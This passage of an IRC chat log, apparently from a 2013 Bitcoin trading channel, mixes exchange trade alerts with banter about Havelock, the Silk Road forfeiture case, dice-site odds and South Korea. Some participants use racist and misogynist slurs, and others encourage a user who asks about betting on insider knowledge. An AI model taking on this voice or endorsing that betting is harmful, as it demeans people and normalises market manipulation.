0.0088 = 0.22 BTC [-] Oct 11 16:53:51 "Rockstar offers $500,000 of in-game cash to frustrated GTA Online players" SEC gonna step in? Oct 11 16:54:05 lol. definitely. Oct 11 16:58:29 [MPEX] [S.MPOE] 4100 @ 0.00085229 = 3.4944 BTC [+] {2} Oct 11 17:11:35 hi Oct 11 17:12:00 anyone in here? Oct 11 17:15:02 yes Oct 11 17:30:01 [HAVELOCK] [AM100] 32 @ 0.008821 = 0.2823 BTC [+] Oct 11 17:33:40 .D Oct 11 17:33:42 .d Oct 11 17:33:42 189281249.28103 | Next Diff in 1149 blocks | Estimated Change: 20.2755% in 6d 8h 34m 33s Oct 11 17:35:07 [HAVELOCK] [AM100] 37 @ 0.009 = 0.333 BTC [+] Oct 11 17:38:40 nothing new but http://bitcoinexaminer.org/bitfunder-com-is-closing-all-activities-to-united-states-users/ Oct 11 17:39:34 o hey, there's an examiner now ? who runs it mike magee ? Oct 11 17:41:56 another courtroom masterpiece http://bitcoinexaminer.org/wp-content/uploads/2013/10/131009-internet-drugs-6p.photoblog600.jpg Oct 11 17:45:15 [HAVELOCK] [AM1] 2 @ 0.99999799 = 2 BTC [+] Oct 11 17:46:16 [MPEX] [S.MPOE] 3050 @ 0.00085218 = 2.5991 BTC [-] Oct 11 17:46:16 [HAVELOCK] [AM1] 1 @ 0.999998 BTC [+] Oct 11 17:48:18 [HAVELOCK] [AM1] 1 @ 0.999998 BTC [+] Oct 11 17:50:16 is the judge that derpy ? and who's black ? dpr was a white kid Oct 11 17:51:27 the public defender Oct 11 17:52:00 i think that artist draws with a derpy pen, no avoiding it Oct 11 17:52:09 lol that's a new one Oct 11 17:52:22 "i'd love to go out on a date, but you've been drawn with the derpy pen" Oct 11 17:52:22 [HAVELOCK] [AM1] 9 @ 0.99999799 = 9 BTC [-] Oct 11 17:52:49 wait the oliver twist figure on the left is dpr ? Oct 11 17:53:15 yes Oct 11 17:54:05 i regret cubist court painters never took off. Oct 11 17:55:00 i like the purple halo everyone has Oct 11 17:55:29 sweet bowtie on the judge too Oct 11 17:57:30 holy crap http://www.wired.com/wiredscience/2013/10/absurd-creature-6-foot-salamander/ Oct 11 17:57:44 I would eat it Oct 11 17:58:07 the way the economy is going, you may have to. Oct 11 17:58:09 i wasnt aware an amphibian could be so large Oct 11 17:58:15 That guy's left hand looks to be in a, bad position. Oct 11 18:12:43 [HAVELOCK] [AM1] 1 @ 0.99999999 BTC [+] Oct 11 18:15:45 in Miami, Florida we have these big monitor type lizards that get to be that big..they've become a bit of a problem..people got them as small pets and let them go into the wild to reproduce. Oct 11 18:15:46 [HAVELOCK] [KCIM] 1 @ 0.415 BTC [+] Oct 11 18:15:47 [HAVELOCK] [AM100] 15 @ 0.00919999 = 0.138 BTC [+] Oct 11 18:16:04 i've seen them 4-6 ft..thats a big damn lizard. Oct 11 18:16:40 you are in miami? Oct 11 18:17:28 they're a problem in costa rica too. they tend to play in the sewage pipes and sometiems get stuck. Oct 11 18:18:46 but lizards are not amphibians Oct 11 18:18:51 large reptiles are wellknown Oct 11 18:19:40 wasnt this found in water ? Oct 11 18:20:00 true but its cool these things sometimes cross the street in the middle of a big city Oct 11 18:20:05 heres what im seeing http://www.newsytype.com/8404-monitor-lizards-florida/ Oct 11 18:20:51 [HAVELOCK] [B] [XBOND] 100 @ 0.001199 = 0.1199 BTC [+] Oct 11 18:21:04 better that thing smell like pepper than body odor Oct 11 18:33:38 o/ Oct 11 18:34:03 ;seen mircea_popescu Oct 11 18:34:04 [HAVELOCK] [AM100] 12 @ 0.00900001 = 0.108 BTC [-] Oct 11 18:34:09 ;;seen mircea_popescu Oct 11 18:34:09 mircea_popescu was last seen in #bitcoin-assets 14 minutes and 28 seconds ago: wasnt this found in water ? Oct 11 18:35:05 [HAVELOCK] [AM100] 16 @ 0.009 = 0.144 BTC [-] Oct 11 18:43:13 [MPEX] [S.MPOE] 295 @ 0.00085102 = 0.2511 BTC [-] Oct 11 18:53:51 http://youtu.be/RBqjZ0KZCa0 Oct 11 18:53:52 Somebody need to pay for my 15 kids - YouTube Oct 11 18:54:00 and be held accountable Oct 11 18:55:25 [HAVELOCK] [AM100] 49 @ 0.00880275 = 0.4313 BTC [-] {3} Oct 11 19:02:09 Mircea_popescu, you around? Oct 11 19:02:33 [HAVELOCK] [VTX] 54 @ 0.42999999 = 23.22 BTC [-] {2} Oct 11 19:15:00 http://thegenesisblock.com/coinlab-files-response-mt-gox-lawsuit/ Oct 11 19:15:01 CoinLab Files Response in Mt. Gox Lawsuit - The Genesis Block Oct 11 19:15:12 o/ ThickAsThieves Oct 11 19:17:10 hi Oct 11 19:17:47 [HAVELOCK] [HIM] 5 @ 0.09 = 0.45 BTC [+] Oct 11 19:19:49 [HAVELOCK] [AM100] 17 @ 0.00923698 = 0.157 BTC [+] {2} Oct 11 19:21:05 I wish Havelock would respond to ANY of BitVPS's queries about possibly moving to their exchange Oct 11 19:21:16 Anyone here associated with Havelock? Oct 11 19:21:51 [HAVELOCK] [KCIM] 10 @ 0.091 = 0.91 BTC [-] Oct 11 19:21:52 [MPEX] [S.MPOE] 4200 @ 0.00085326 = 3.5837 BTC [+] {2} Oct 11 19:22:55 phungus: topace Oct 11 19:23:06 topace Oct 11 19:23:07 gotcha Oct 11 19:23:08 thanks Oct 11 19:23:09 yes ? Oct 11 19:23:14 oh Oct 11 19:23:17 our emails have been down Oct 11 19:23:19 for 2 days Oct 11 19:23:20 DDOS Oct 11 19:23:23 hey. Namworld has been emailing for weeks though Oct 11 19:23:25 our inbound emails Oct 11 19:23:30 I think Oct 11 19:23:32 oh Oct 11 19:23:35 ever since the BTCT announcement Oct 11 19:23:44 we arent taking on any new listings at the moment Oct 11 19:23:47 we have shareholders that are screwed atm Oct 11 19:23:49 oh crap Oct 11 19:23:51 :-( Oct 11 19:23:55 until we figure out our regulatory situation Oct 11 19:23:58 that is sad because BitVPS is a legit, real company Oct 11 19:24:01 O_o Oct 11 19:24:02 indeed Oct 11 19:24:05 halp Oct 11 19:24:05 hold tight Oct 11 19:24:08 once we get our emails back up Oct 11 19:24:20 we're close to finalizing details with our lawyers Oct 11 19:24:25 well that is good Oct 11 19:24:27 and should have answers soon Oct 11 19:24:37 we would love to grace your exchange with our ticket Oct 11 19:24:38 and _hopefully_ can oepn back up applications Oct 11 19:24:39 ticker Oct 11 19:24:40 :-) Oct 11 19:25:05 but we will NOT carte-blanche accept all listings from btct/bf, normal due diligence rules will still apply Oct 11 19:25:13 yeah, understood Oct 11 19:25:20 historicallyl we Oct 11 19:25:23 I have an alt-coin ticker. :D Oct 11 19:25:27 like I said before, we're probably one of the only 'real' businesses Oct 11 19:25:29 historically, we've rejected about 90% of applicants Oct 11 19:25:37 yea Oct 11 19:25:39 and we've been around for 2 years now Oct 11 19:25:41 i like bitvps Oct 11 19:25:43 i have a vps with you :p Oct 11 19:25:46 hah Oct 11 19:25:48 werd Oct 11 19:25:59 well, at least we know where it stands now Oct 11 19:26:01 i originally tried to use it to run my websocket from, but gave up, and went to pusher.com Oct 11 19:26:17 topace: we have some new dedi offerings that are about to be ready that might work better Oct 11 19:26:23 48GB ram, quad cores Oct 11 19:26:33 I bet that would be enough Oct 11 19:26:34 :-) Oct 11 19:27:10 dual quadcore Oct 11 19:27:12 * Oct 11 19:27:13 but also, it depends on the tech underneath. We have SSD nodes, KVM. Xen, and OpenVZ Oct 11 19:27:18 yes, dual quad cores Oct 11 19:27:22 for under $200/mo Oct 11 19:27:30 I think Oct 11 19:27:41 thats right :) Oct 11 19:27:46 brb phone Oct 11 19:31:26 http://bitbet.us/bet/552/havelock-will-announce-us-restrictions-by-guy-fawkes/ Oct 11 19:31:29 BitBet - Havelock will announce US restrictions by Guy Fawkes Night Oct 11 19:37:55 heh cna i use insider knowledge to bet ? Oct 11 19:38:09 damn shit, i just saw someone who won a 1 - 10 odds bet 40 times in a row Oct 11 19:38:10 guess there's no wya of stopping me Oct 11 19:38:22 on just-dice… wtf? Oct 11 19:38:30 topace: you sure can! Oct 11 19:38:41 lol Oct 11 19:38:51 so Oct 11 19:38:54 watch bitbet currently Oct 11 19:38:56 ;;later tell jborkl yeah Oct 11 19:38:57 The operation succeeded. Oct 11 19:39:04 watch what happens after topace bets Oct 11 19:39:11 all of us benefit Oct 11 19:39:12 lol Oct 11 19:39:30 Weighted No: 23`297 Oct 11 19:39:31 Weighted Yes: 35`904 Oct 11 19:39:42 Current weight: 91`025 ( from 100`000 to 1 ) Oct 11 19:39:43 Confirmed bets: 5 ( No: 2 / Yes: 3 ) Oct 11 19:39:44 ok Oct 11 19:39:46 watch what happens when i place a 1btc bet and everyone thinks it's topace Oct 11 19:39:48 so there is our start Oct 11 19:39:51 lol Oct 11 19:39:54 only 5 bets so far Oct 11 19:40:28 is dooglus here sometimes? Oct 11 19:41:21 yeah, occasionally. Oct 11 19:41:48 when is guy fawkes night and who the fuck is guy fawkes Oct 11 19:41:52 how is his nick then mircea_popescu ? Oct 11 19:41:58 like in the forum? Oct 11 19:42:08 ;;seen dooglus? Oct 11 19:42:08 I have not seen dooglus?. Oct 11 19:42:20 he's almost never here Oct 11 19:42:49 it Oct 11 19:42:50 s dooglus Oct 11 19:43:08 ;;seen dooglus Oct 11 19:43:08 dooglus was last seen in #bitcoin-assets 9 weeks, 1 day, 13 hours, 51 minutes, and 8 seconds ago: seen mircea_popescu? Oct 11 19:43:14 lolk Oct 11 19:43:51 i really think there is an issue with the random generator Oct 11 19:44:10 how freakin unlikely is it that someone wins a 1-9 odds bet 40 times in a row Oct 11 19:44:19 jcpham: november 5, duh! Oct 11 19:44:20 you know how to calculate those odds ? Oct 11 19:44:20 bonfire night Oct 11 19:44:20 ;;seen dooglus Oct 11 19:44:20 dooglus was last seen in #bitcoin-assets 9 weeks, 1 day, 13 hours, 52 minutes, and 20 seconds ago: seen mircea_popescu? Oct 11 19:44:21 1/9^40 Oct 11 19:44:51 oic Oct 11 19:45:14 actully its 1/10^40 Oct 11 19:45:21 thats really not realistic Oct 11 19:45:23 ... Oct 11 19:46:15 [MPEX] [S.MPOE] 5550 @ 0.00084991 = 4.717 BTC [-] {2} Oct 11 19:46:48 that Oct 11 19:46:51 ie-40! Oct 11 19:46:52 s not exactly correct tho Oct 11 19:46:55 i mean, 1e-40 Oct 11 19:47:58 did the person do the same exact thing ? Oct 11 19:48:20 i mean, having 1 come out of 40 consecutive 1-10 rolls is not the same as having a player always bet on the correct outcome 40 times in a row Oct 11 19:48:36 the odds are 1:9, each time. Simple! Oct 11 19:48:46 well, yes Oct 11 19:48:53 but that aside, we have had all sorts of doubts and suspicions about that for months now. Oct 11 19:48:55 each individual roll is 1:9 Oct 11 19:49:00 40 in a row, though Oct 11 19:49:08 infinitesimally small Oct 11 19:49:10 this includes dooglus himself, but so far nobody's proven much Oct 11 19:49:20 although obv just as likely to happen as any other given 40-roll combo Oct 11 19:49:27 sometimes you get a royal flush Oct 11 19:49:33 nubbins` there's a l'hospital rule which tells you what are the odds of Y probabilty event occuring in X tries. Oct 11 19:49:54 yep Oct 11 19:49:59 <--math degree Oct 11 19:50:17 aha. so ok. out of what, 10^7 bets or so ? Oct 11 19:50:37 40 consecutive 1's in a 1-10 roll are still pretty darn unlikely. Oct 11 19:50:55 i will upload the screen in the forum as soon as i am at home Oct 11 19:50:57 phungus, namworld: why "pls halp"? just track the shares on your own... problem solved Oct 11 19:51:04 honestly… this is crazy Oct 11 19:51:12 jimmy2k one thing you can do is simulate it. Oct 11 19:51:16 they allow 0 btc bets iirc. Oct 11 19:51:27 you can run that for a while and see the quality. Oct 11 19:51:29 jimmy2k: maybe you had your filter set up so that you only saw the wins? Oct 11 19:51:32 jurov: I've thought about that Oct 11 19:51:38 if you filter for btc won, not btc risked Oct 11 19:51:39 jurov: not sure we have the resources, honestly Oct 11 19:51:59 phungus" i Oct 11 19:52:23 [HAVELOCK] [HIM] 65 @ 0.07320179 = 4.7581 BTC [-] {20} Oct 11 19:52:25 phungus i can make you an app for simple registration and shares transfers Oct 11 19:52:33 for, say, 5btc Oct 11 19:52:40 aint rocket science Oct 11 19:52:40 jurov: hmmmm Oct 11 19:52:53 jurov: I will discuss this with the others Oct 11 19:53:04 jurov: thx Oct 11 19:53:19 no trade engine necessary Oct 11 19:53:53 so here's the beauty of american courts. in May Coinlab sues MtGox. In SEPTEMBER!!! MtGox replies. Oct 11 19:54:04 lol Oct 11 19:54:13 on the other hand, in August USG sues pirate, the same day the judge rules and the sentence is passed. Oct 11 19:54:13 how is everyone Oct 11 19:54:20 i gotta buy my own magistrate judges, this is a scandal. Oct 11 19:54:32 its funny Oct 11 19:54:48 in pakistan, one of the things the taliban offered the people was prompt speedy court trials Oct 11 19:54:54 and the people supported them because of that Oct 11 19:55:08 because it was possible to die of old age before getting your day in court in pakistan Oct 11 19:55:26 of course, the taliban did not turn out to be the nice helpful people one would have hoped for Oct 11 19:55:44 but still, access to speedy redress by law is a big need for people Oct 11 19:55:49 ya well herp. tyvm but a court system that waits after hours to suck govt cock, like the recent lavabit case Oct 11 19:56:01 and then does jack shit in private cases... heh. tyvm, but no. Oct 11 19:56:04 yeah Oct 11 19:56:06 i agree Oct 11 19:56:21 well, govt is govt Oct 11 19:56:30 my point is that when courts start sucking this bad, people will even support the taliban to get the services they need Oct 11 19:56:35 provincial govt here has a nice trick where they issue press releases at 4:30pm on fridays Oct 11 19:56:48 http://trilema.com/2013/so-whos-running-the-courts-circus/ Oct 11 19:56:48 So who’s running the Courts circus ? pe Trilema - Un blog de Mircea Popescu. Oct 11 19:56:49 so media doesn't get around to serious coverage til the following monday Oct 11 19:56:59 check that shit out. the judge actually sat around thje courthouse after closing time to write orders Oct 11 19:57:10 https://bitcointalk.org/index.php?topic=297503.msg3320083#msg3320083 Oct 11 19:57:12 [ActiveMining] The Official Active Mining Discussion Thread [Self-Moderated] Oct 11 19:57:16 mjr_ you prolly have a poin there. Oct 11 19:57:17 fancy new bitcoin accounting Oct 11 19:57:45 hahahahahahaha Oct 11 19:58:00 sales include promises to buy Oct 11 19:58:07 sweet Oct 11 19:58:07 an0 or death. Oct 11 19:58:31 "so basically if you abandoned your shopping cart because you wanted a cointerra instead, ken is still counting your order as a sale" Oct 11 19:58:34 lel Oct 11 19:58:49 I think PR needs to get involved in that one :) Oct 11 19:58:59 nubbins` any editor worth his salt would in response make fridays workdays 8am to 8pm and give ppl tuesday of Oct 11 19:59:06 jborkl selfmod threads get ignored. Oct 11 19:59:26 mircea_popescu: then how are they supposed to write indignant editorials? Oct 11 19:59:26 ah, did not notice that Oct 11 19:59:45 you just lock them in the office. "you leave here once you've covered the prs" Oct 11 20:00:14 make it clear that as long as the provincial govt continues with the practice, everyone's weekeend is shot. Oct 11 20:00:30 [HAVELOCK] [AM1] 1 @ 0.9999 BTC [-] Oct 11 20:01:50 ooh, i've been selected for a free cruise to the bahamas! Oct 11 20:02:08 all i must do is press 1 to participate in a survey!! Oct 11 20:02:32 [MPEX] [S.MPOE] 1550 @ 0.00085477 = 1.3249 BTC [+] Oct 11 20:02:32 i used to hang up on calls like this, now i just lay the phone down and let the robocaller time out Oct 11 20:02:34 sorry nubs, the bahamas is shutdown Oct 11 20:02:37 because it is part of the OCEAN Oct 11 20:02:56 yeah afaik the usa claims jurisdiction over oceans Oct 11 20:03:09 because americans drink water Oct 11 20:03:17 seems reasonable. Oct 11 20:05:05 so if someone in Africa pees in the ocean , is that a act of terror? Oct 11 20:05:16 threat level yellow Oct 11 20:05:47 we pump raw sewage into the ocean here, we're probably on all types of lists Oct 11 20:06:03 of are you French? Oct 11 20:06:06 oh Oct 11 20:06:10 the japanese pumped fukushima waste water into the ocean Oct 11 20:06:12 terrorists. Oct 11 20:06:41 nah canadian Oct 11 20:06:49 TBF they built a sewage treatment plant Oct 11 20:07:02 but of course the contractors fucked it up and it's been shut down until it can be fixed Oct 11 20:07:39 I went of vacation to Martinugue, they still have open sewer systems draining down the side of the road :/ Oct 11 20:07:43 :0 Oct 11 20:07:46 Martinique Oct 11 20:08:03 my apartment in second-best korea was near an open sewer Oct 11 20:08:15 the smell still reminds me of that place Oct 11 20:08:38 [MPEX] [S.MPOE] 2950 @ 0.00085477 = 2.5216 BTC [+] Oct 11 20:10:06 do you mean that in a good way ? Oct 11 20:10:58 The inability of people to follow directions is appalling Oct 11 20:11:28 nah Oct 11 20:11:49 jesus twitter is almost as stupid as reddit by now. Oct 11 20:11:49 while i appreciate the experience, i had an overall negative experience while living in SK Oct 11 20:12:06 now the smell of sewage reminds me of bad times Oct 11 20:12:12 which, i suppose, is fitting Oct 11 20:12:18 what were you doing there anyway ? Oct 11 20:12:35 same thing every canadian with a university degree was doing Oct 11 20:12:49 teaching english Oct 11 20:12:52 scoring cheap azn cunt for packaged consumer goods ? Oct 11 20:12:54 or that. Oct 11 20:13:00 and that Oct 11 20:13:22 plenty of "party girls" karaoke bars Oct 11 20:13:52 anyway, relatively high pay, relatively low cost of living Oct 11 20:14:13 you can get drunk every night, eat out every day, and still send home $1000+ per month Oct 11 20:14:27 ya but you're surrouinded by idiots and wasting your time. Oct 11 20:15:11 well, that's only half true Oct 11 20:15:35 (half the people are idiots and half your time is wasted) Oct 11 20:15:40 lol Oct 11 20:15:56 i'm of two minds on the whole thing Oct 11 20:16:27 it was my first time travelling to a foreign country alone, which led to me being bitten by the travel bug, which i consider a huge positive Oct 11 20:16:37 and i was able to pay off my student loans in only 9 months Oct 11 20:16:42 i dunno, in my experience citizens of totalitarian regimes make excellent servants but poor company. Oct 11 20:16:51 nono, i said second-best korea Oct 11 20:16:56 not best korea Oct 11 20:16:57 o o wait. Oct 11 20:17:10 i mixed them up huh. kay. Oct 11 20:17:14 diff story then Oct 11 20:17:17 everybody does Oct 11 20:17:25 did you know samsung makes cars over there? Oct 11 20:17:30 and apartment building complexes? Oct 11 20:17:33 yeah Oct 11 20:17:37 chaebol thing Oct 11 20:17:51 and kimchi fridges, which is possibly the strangest home appliance i've ever seen Oct 11 20:17:56 s/is/are Oct 11 20:18:19 http://upload.wikimedia.org/wikipedia/commons/7/77/South_Korea's_GDP_(PPP)_growth_from_1911_to_2008.png Oct 11 20:18:22 the bitcoin of countries. Oct 11 20:18:39 they do not fuck around at all Oct 11 20:18:41 I'm getting migration requests for "TAT.S.MPOE-PT" Oct 11 20:18:43 lol Oct 11 20:19:10 mircea_popescu: large gap between rich and poot Oct 11 20:19:13 i mean poor Oct 11 20:19:17 rich and poot Oct 11 20:19:18 lol Oct 11 20:19:33 mmm are you rich or do you poot? Oct 11 20:19:41 old ladies selling boiled insects on street corners outside 100-story skyscrapers Oct 11 20:19:54 that gap is the best thing in the world. Oct 11 20:20:21 ThickAsThieves is that a good thing ? Oct 11 20:20:40 but even the poor have lots of tech Oct 11 20:21:00 that old lady selling bugs has a cellphone that can receive live television 200ft underground Oct 11 20:21:16 it's a country of really odd juxtapositions Oct 11 20:22:29 anyway, that GDP chart is more luck than anything. it was decided that the north part of korea would be used for agriculture and the south part for industry Oct 11 20:22:48 but then war-by-proxy drew a nice wide line through the middle Oct 11 20:23:14 and it turned out industry was more of a money-maker than growing rice Oct 11 20:23:34 ThickAsThieves is that a good thing ? --- I run no such PT Oct 11 20:23:38 where's luck figure into that ? Oct 11 20:24:06 ThickAsThieves there you go, crashing people's dreams. Oct 11 20:24:08 well, if they decided that agriculture belonged in the south, then seoul wouldn't exist Oct 11 20:24:17 they were rich in inexistent pt holdings of mpoe stock Oct 11 20:24:21 and best korea would be making kimchi fridges Oct 11 20:24:30 nubbins` no it wouldn't. Oct 11 20:24:39 they of course are thinking of Namworld's PT Oct 11 20:24:52 but funny how they just add TAT. in front and email me Oct 11 20:25:10 and presume it exists on Havelock Oct 11 20:25:11 lol Oct 11 20:25:14 mircea_popescu: you're suggesting that proximity to china/ussr was more of a deciding factor in NK's fate? Oct 11 20:25:54 nubbins` im suggesting that the part in which the govt was going to be strong was going to starve, and the part where the govt was going to suck entrepreneur cock was going to boom. Oct 11 20:26:02 this irrespective of any considerations whatsoever at all. Oct 11 20:26:11 hmm Oct 11 20:26:38 if you use the state to borrow money which you give to the business people to do stuff, you'll be rich. it worked fgor koreea, it worked for venice 1k years before that. Oct 11 20:26:54 if you use the state for any other purpose, including "to make people happy", to "fight racism" or whatever, to clean up grafitti, Oct 11 20:26:55 that's an interesting point Oct 11 20:26:57 you will starve. Oct 11 20:27:12 strictly the only consideration is how dedicated the whole of society is to sucking businessman cock. Oct 11 20:27:37 SK as a rule are intensely dedicated to this Oct 11 20:27:43 yea Oct 11 20:27:50 it shows, for instance in that graph. Oct 11 20:27:58 you can seriously buy buddhist charms that are supposed to give you luck in your government exams Oct 11 20:28:02 it's not luck except in the sense of "they got lucky", now they have cum on upper lip. Oct 11 20:28:12 like, specifically, those particular exams Oct 11 20:28:51 not general luck, or even general academic luck Oct 11 20:29:07 anyway, only i think 1/4 of the population was buddhist Oct 11 20:29:22 much more laid back than the christian 1/4, which was unwaveringly insufferable Oct 11 20:29:58 why do buddhists care about luck? Oct 11 20:30:19 isn't buddhism like nihilism made into a less depressing concept Oct 11 20:30:31 lol Oct 11 20:31:00 nah, they're all about karma Oct 11 20:31:10 in the actual sense of the word, not the misappropriated sense Oct 11 20:31:28 but i recall the epitome of buddhism being nothingness Oct 11 20:32:02 impact-neutral zen Oct 11 20:32:03 well, the goal is zen/nirvana/whatever more often than not Oct 11 20:32:04 or whatever Oct 11 20:32:08 uh oh Oct 11 20:32:23 ... Oct 11 20:32:35 but you can't be zen if you don't pass your government exams Oct 11 20:32:47 and marry and have kids (bonus points if it's a lucky year) Oct 11 20:32:59 and take care of your parents/in-laws until they die Oct 11 20:33:12 doesn't sound too zen to me. Oct 11 20:33:20 did i mention there are huge alcohol problems? Oct 11 20:33:34 how about the govt can't be zen until it passes you and the future wife can;'t be zen untill she marries you and gets pregnant ? Oct 11 20:33:50 D3, why do you always wanna do things that can't be done, and then execute on things that shouldnt be done? Oct 11 20:33:58 mircea_popescu: that's not far off from the reality Oct 11 20:34:19 ThickAsThieves what did he do now ? Oct 11 20:34:20 the future wife literally cannot be zen until she is married with children Oct 11 20:34:35 [13:32] I think I could make an open source GPU Oct 11 20:34:35 [13:32] that could beat amd and nvidia Oct 11 20:34:39 nubbins` cool. i imagine dating is very relaxing there Oct 11 20:34:54 it's very stressful Oct 11 20:35:07 they have colour days at least once a month with the intent of fostering romance Oct 11 20:35:11 http://world.time.com/2013/10/08/north-korea-puts-troops-on-war-footing-and-warns-of-horrible-disaster/ Oct 11 20:35:12 North Korea Puts Troops on War Footing and Warns of ‘Horrible Disaster’ | TIME.com Oct 11 20:35:29 valentines day, men give gifts to women. white day (march 14), women give gifts to men. green day, singles wear green Oct 11 20:35:37 etc etc Oct 11 20:35:39 pepero day, everyone gives each other pepero Oct 11 20:35:47 no dildo day ? Oct 11 20:35:51 not yet Oct 11 20:36:03 although there is a sex park on jeju island Oct 11 20:36:11 that lots of couples visit on honeymoon Oct 11 20:36:15 sponsored by jeju jel ? Oct 11 20:36:29 maybe NK should actually shoot someone so people can take them seriosly Oct 11 20:36:31 u Oct 11 20:36:37 http://en.wikipedia.org/wiki/File:Love_Land_interactive_articulated_puppet.jpg Oct 11 20:36:47 jesus that looks sad Oct 11 20:37:04 http://www4.pictures.zimbio.com/gi/Scenes+Theme+Park+Love+Land+Jeju+KRBK46RtoMbl.jpg Oct 11 20:37:10 some of it is EPIC Oct 11 20:37:22 http://www3.pictures.zimbio.com/gi/Scenes+Theme+Park+Love+Land+Jeju+_V7gdKGA_FNl.jpg Oct 11 20:37:26 awesome Oct 11 20:37:40 kinda shitty. Oct 11 20:37:42 why are all the men western Oct 11 20:37:48 http://cdn2.listsoplenty.com/listsoplenty-cdn/pix/uploads/2012/03/South-Korea_s-Jeju-Island-Love-Land.jpg Oct 11 20:37:52 i dunno man, i'm born among the greek sculpture work. Oct 11 20:38:00 yeah Oct 11 20:38:04 lol Oct 11 20:38:07 doesn't hold a candle to that, i guess Oct 11 20:38:20 there was one sculpture that was literally a glory hole Oct 11 20:38:23 can't find a pic Oct 11 20:38:28 http://img.myconfinedspace.com/wp-content/uploads/2006/12/1166615591_10.thumbnail.jpg Oct 11 20:38:30 that is kinda good. Oct 11 20:38:45 aha! Oct 11 20:38:49 http://cdn.enjoyourholiday.com/wp-content/uploads/2010/12/Jeju-sex-park-Korea-image15.jpg Oct 11 20:38:49 mother nature getting some Oct 11 20:39:08 http://img.myconfinedspace.com/wp-content/uploads/2006/12/1166615591_06.thumbnail.jpg why's the guy derpy and fat ? Oct 11 20:39:30 prolly cos he's white Oct 11 20:39:32 http://www1.pictures.zimbio.com/gi/Scenes+Theme+Park+Love+Land+Jeju+KXsx0UHWB_vl.jpg Oct 11 20:39:50 do they have a "topless only" rule for visiting ? Oct 11 20:40:06 nah, koreans are too prudish for that Oct 11 20:40:10 so it's a sex park to see statues, not to have sex Oct 11 20:40:28 well... a park with niormal statues where the girls had to check out their blouse at the entrance Oct 11 20:40:29 honestly, the fact this park exists is extremely bizarre, given their attitudes toward sex in general Oct 11 20:40:33 would work a lot better than this atrocity. Oct 11 20:40:36 not as repressed as japan, but close Oct 11 20:40:40 http://www4.pictures.zimbio.com/gi/Scenes+Theme+Park+Love+Land+Jeju+gX5qq4sFQfRl.jpg Oct 11 20:40:44 im sorry but here you'd flunk art school if that was your product Oct 11 20:40:46 ^^^ common sight Oct 11 20:40:52 this park would probly do well in NY Oct 11 20:41:51 maybe they should make topless day. on april 15th you take your gf to the magical park and she gives you her top. Oct 11 20:42:05 then you give her a dinner and a movie or w/e they do Oct 11 20:42:16 dinner and some karaoke Oct 11 20:42:46 a ok. shrimp and shit ? or what's the best meal there ? Oct 11 20:42:52 bird's nest ? Oct 11 20:43:28 korean cuisine is the best in the world, bar none Oct 11 20:43:36 it's the only reason i'd ever consider going back there Oct 11 20:43:43 msut be all the piss. Oct 11 20:43:49 lol Oct 11 20:43:56 dolsot bibimbap is really good Oct 11 20:44:01 as is kimchi jjigae Oct 11 20:44:10 all of it, really Oct 11 20:44:21 A North Korean military spokesman said that the U.S. would be “wholly accountable for the unexpected horrible disaster” that faced its “imperialist aggression forces.” Oct 11 20:44:27 well if it's unexpected... Oct 11 20:44:32 see, traditional korean food is not only delicious as fuck, but good for you Oct 11 20:44:36 nubbins` hey you canadian folks didn't also teach logic did you Oct 11 20:44:41 traditional food here is root vegetables and salt beef Oct 11 20:44:56 mircea_popescu: logic has no place in north/south relations Oct 11 20:45:12 it's the same thing in romania, traditional food is delicious and good for oyu. it's the same thing in all countries where "traditional" means 2k years rather than w/e, 60 Oct 11 20:45:34 pizza rolls arent traditional? Oct 11 20:45:38 whitey has been on this island for 500 years Oct 11 20:45:55 and it's been salt fish, salt beef, and root veg that whole time Oct 11 20:46:02 now everyone is fat and has heart attacks Oct 11 20:46:02 http://www.popehat.com/2013/10/10/silk-road-update-federal-prosecutors-file-separate-forfeiture-complaint/ Oct 11 20:46:32 lol the entire "gimme money" uncle sam tactics don't work so well in btc ? Oct 11 20:46:55 you'd think they'd at least cc the bitcoin foundation on that complaint Oct 11 20:47:32 "identity hearing"? Oct 11 20:47:32 ThickAsThieves who's running the popehat ? Oct 11 20:47:46 dunno Oct 11 20:48:39 UNITED STATES v. ANY AND ALL ASSETS OF SILK ROAD, INCLUDING BUT NOT LIMITED TO THE SILK ROAD HIDDEN WEBSITE AND ANY AND ALL BITCOINS CONTAINED IN WALLET FILES RESIDING ON SILK ROAD SERVERS, INCLUDING THE SERVERS ASSIGNED THE FOLLOWING INTERNET PROTOCOL ADDRESSES: 46.183.219.244; 109.163.234.40; 193.107.86.34; 193.107.86.49; 207.106.6.25; AND 207.106.6.32; Oct 11 20:48:47 that *is* a comical case name Oct 11 20:49:33 "“Don’t let tea farmers get f****d, buy directly from the source. Don’t let the financial system f*** us, use bitcoin!” Oct 11 20:49:34 Elyse Petersen, founder and CEO of Hawaii-based farm-direct tea marketplace Tealet, felt these were the right words to accompany her company’s announcement that it would begin accepting bitcoin payments starting 17th September. They echoed Tealet’s core values, illustrated bitcoin’s utility and grabbed attention. Oct 11 20:49:34 Unfortunately, some of Tealet’s partners didn’t appreciate the message." Oct 11 20:49:40 users' unspent funds are not the proceeds of crime though, hey? Oct 11 20:49:57 nubbins` moreover meaningless. Oct 11 20:50:02 it's a case against unspecified items. Oct 11 20:50:07 o Oct 11 20:50:11 well! Oct 11 20:50:14 What if Silk Road is holding some of your Bitcoins as part of some transaction? Why, all you have to do is show up and make a claim for them — in a case in which the government is saying that all or substantially all of the transactions through Silk Road are federal crimes. Bring a toothbrush. Oct 11 20:50:18 UNITED STATES v. EVERYTHING Oct 11 20:50:21 "i hereby sue all the people who might have pissed me off" Oct 11 20:50:34 and may piss you off in the future? Oct 11 20:50:43 might as well cover that too Oct 11 20:50:47 jurov: well, an idiot would make a claim for in-limbo funds Oct 11 20:50:50 the usg is not that advanced as of yet. Oct 11 20:51:01 how about the guy who just transferred 1btc to his SR wallet? Oct 11 20:51:04 tho the lavabit prosecutor was TRYING, as the judge pointed out Oct 11 20:51:28 that judge deserves some bitcoin Oct 11 20:52:12 no judge deserves any bitcoin. Oct 11 20:53:03 jurov: siezing funds in user accounts is like the cops knocking on my door and demanding the contents of any jars with "to be used for drugs" on the label Oct 11 20:53:11 future crime! Oct 11 20:54:06 i dunno Oct 11 20:54:08 actually if the us residend youth wasn't braindamaged, there'd be a bunch of "DRUGS" labeled containers everwhere Oct 11 20:54:10 this is more like Oct 11 20:54:11 so why the distingushed author felt a need of such utterance? Oct 11 20:54:15 as well as a bunch of "child porn" files on all hard drives Oct 11 20:54:26 you give your money to drug distributor as credit for future buys Oct 11 20:54:31 and he gets nabbed Oct 11 20:54:51 This seems an 